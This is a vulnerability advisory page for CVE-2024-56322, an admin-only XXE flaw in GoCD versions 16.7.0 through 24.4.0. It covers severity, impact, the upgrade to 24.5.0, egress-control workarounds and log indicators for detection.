CVE-2024-56322 – GoCD versions 16.7.0 through 24.4.0 contain an ... (How to Fix)

Q: What is the severity of CVE-2024-56322?

CVE-2024-56322 has a CVSS score of 7.2 (HIGH). GoCD versions 16.7.0 through 24.4.0 contain an XML External Entity (XXE) injection vulnerability in a hidden configuration repository feature. This allows GoCD administrators to execute XXE attacks when the server scans configuration repositories, potentially leading to server-side request forgery or data exfiltration. Only GoCD super administrators can exploit this vulnerability.

📋 TL;DR

GoCD versions 16.7.0 through 24.4.0 contain an XML External Entity (XXE) injection vulnerability in a hidden configuration repository feature. This allows GoCD administrators to execute XXE attacks when the server scans configuration repositories, potentially leading to server-side request forgery or data exfiltration. Only GoCD super administrators can exploit this vulnerability.

💻 Affected Systems

Products:

GoCD Continuous Delivery Server

Versions: 16.7.0 through 24.4.0 (inclusive)

Operating Systems: All platforms running GoCD

Default Config Vulnerable: ⚠️ Yes

Notes: The vulnerable feature is a hidden/unused configuration repository (pipelines as code) feature that administrators can access.

📦 What is this software?

Gocd by Thoughtworks

View all CVEs affecting Gocd →

⚠️ Risk & Real-World Impact

🔴

Worst Case

A malicious GoCD administrator could perform server-side request forgery, read arbitrary files from the GoCD server filesystem, or potentially execute remote code through XXE payloads.

🟠

Likely Case

Limited impact since only trusted administrators can exploit it - a malicious administrator already has extensive system access and could cause damage through other means.

🟢

If Mitigated

Minimal impact with proper egress controls preventing the GoCD server from making arbitrary external requests.

🌐 Internet-Facing: LOW - Exploitation requires administrative access to GoCD, which should not be exposed to untrusted users.

🏢 Internal Only: MEDIUM - While only administrators can exploit it, insider threats or compromised admin accounts could leverage this vulnerability.

🎯 Exploit Status

Public PoC: ✅ No

Weaponized: UNKNOWN

Unauthenticated Exploit: ✅ No

Complexity: MEDIUM

Exploitation requires GoCD administrator privileges and knowledge of the hidden configuration repository feature. The vulnerability triggers during periodic configuration repository scans or when manually triggered by an administrator.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: GoCD 24.5.0

Vendor Advisory: https://github.com/gocd/gocd/security/advisories/GHSA-8xwx-hf68-8xq7

Restart Required: No

Instructions:

1. Download GoCD 24.5.0 from the official releases page. 2. Follow the GoCD upgrade documentation for your deployment method (Docker, package manager, or manual). 3. Verify the upgrade completed successfully.

🔧 Temporary Workarounds

Egress Control Workaround

all

Prevent the GoCD server from making arbitrary external network requests to limit XXE impact

Configure firewall rules to restrict outbound connections from GoCD server
Use network policies or security groups to limit egress traffic

🧯 If You Can't Patch

Implement strict egress controls to prevent GoCD server from accessing arbitrary external locations
Review and restrict GoCD administrator privileges to only trusted personnel

🔍 How to Verify

Check if Vulnerable:

Check GoCD version via admin interface or by examining server logs/configuration files

Check Version:

Check GoCD admin dashboard or run: java -jar gocd.jar --version (if applicable)

Verify Fix Applied:

Confirm GoCD version is 24.5.0 or higher via admin dashboard or version check command

📡 Detection & Monitoring

Log Indicators:

Unusual XML parsing errors in GoCD logs
Unexpected external network requests from GoCD server process
Configuration repository scan failures

Network Indicators:

Unexpected outbound HTTP/HTTPS requests from GoCD server to unusual destinations
DNS requests for internal or external entities from GoCD server

SIEM Query:

source="gocd.log" AND ("XML" OR "XXE" OR "external entity" OR "configuration repository")

📊 Metadata

CVE ID: CVE-2024-56322

CVSS v3 Score: 7.2 (HIGH)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CWE: CWE-611

EPSS Score: 0.42% exploit probability (61.5th percentile)

Published: January 3, 2025

Last Updated: August 1, 2025

🔗 References

https://github.com/gocd/gocd/commit/410331a97eb2935e04c1372f50658e05c533f733 Patch
https://github.com/gocd/gocd/releases/tag/24.5.0 Release Notes
https://github.com/gocd/gocd/security/advisories/GHSA-8xwx-hf68-8xq7 Vendor Advisory
https://www.gocd.org/releases/#24-5-0 Release Notes

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2024-56322, you might also want to check these: